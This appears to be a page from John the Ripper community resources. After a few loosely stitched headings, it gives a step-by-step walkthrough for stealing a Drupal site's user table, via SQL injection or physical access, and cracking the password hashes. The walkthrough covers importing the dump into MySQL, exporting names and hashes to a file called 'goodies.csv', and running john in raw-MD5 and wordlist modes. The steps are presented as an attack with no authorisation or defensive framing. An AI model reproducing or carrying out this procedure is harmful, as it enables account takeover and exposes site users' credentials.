Version able to bruteforce GPG pass-phrases
Compile with Multi-threaded support and GPU support
Recompiling with multicore support
John the Ripper user community resources
How to use John The Ripper to crack Drupal Database:
-
Get the drupal database via sql inject or physical access and save to data.sql
-
Run sudo /etc/init.d/mysql restart
-
Login to database with mysql -uroot -ptoor
-
Run CREATE database hack
-
Exit mysql and the run the following command
-
mysql -uroot -p hack < data.sql
-
Now you can export the database in the right format for john, as well as run
queries on the data (time logged in, email, etc) once you crack a password
-
get back into mysql, run the command: use hack;
-
then copy and paste the following text into the mysql run window: SELECT name,pass INTO OUTFILE '/tmp/goodies.csv' FIELDS TERMINATED BY ':' OPTIONALLY ENCLOSED BY "" LINES TERMINATED BY '\n' FROM drup_users;
-
Exit mysql again and cd into /tmp or move the file to your home directory (If you cat the file it would show the following)
[goodies.csv] username:passwordHash1 username:passwordHash2 etc
- copy the file to john's folder using the following command: cp /tmp/goodies.csv /pentest/passwords/jtr/
Now run john cracking on it using the following:
./john --format:raw-MD5 goodies.csv
See output in john.pot or run:
./john --format:raw-MD5 goodies.csv --show
You can also do wordlists like this:
./john --format:raw-MD5 goodies.csv -w:wordlist.txt